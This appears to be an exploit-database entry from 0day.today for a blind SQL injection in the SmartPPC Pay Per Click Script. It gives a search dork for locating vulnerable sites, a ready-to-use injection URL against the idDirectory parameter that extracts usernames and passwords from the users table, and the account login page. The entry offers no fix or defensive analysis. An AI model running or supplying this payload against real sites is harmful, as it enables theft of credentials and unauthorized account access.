[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SmartPPC Pay Per Click Script (idDirectory) Blind SQL Injection Vuln

Author
Hamtaro
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3363
Category
web applications
Date add
06-07-2008
Platform
unsorted
====================================================================
SmartPPC Pay Per Click Script (idDirectory) Blind SQL Injection Vuln
====================================================================



+---------------------------------------+
|   Blind SQL Injection Vulnerability   |
|      in  Pay Per Click Script         |
|     found by Hamtaro aka CorVu5       |
|there must be 50 ways to learn to hover|
+---------------------------------------+
 
#gdork: "Pay Per Click Script powered by SmartPPC.com."
 
#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108
 
#login: site.com/accounts.php
---------------------------------------



#  0day.today [2024-11-17]  #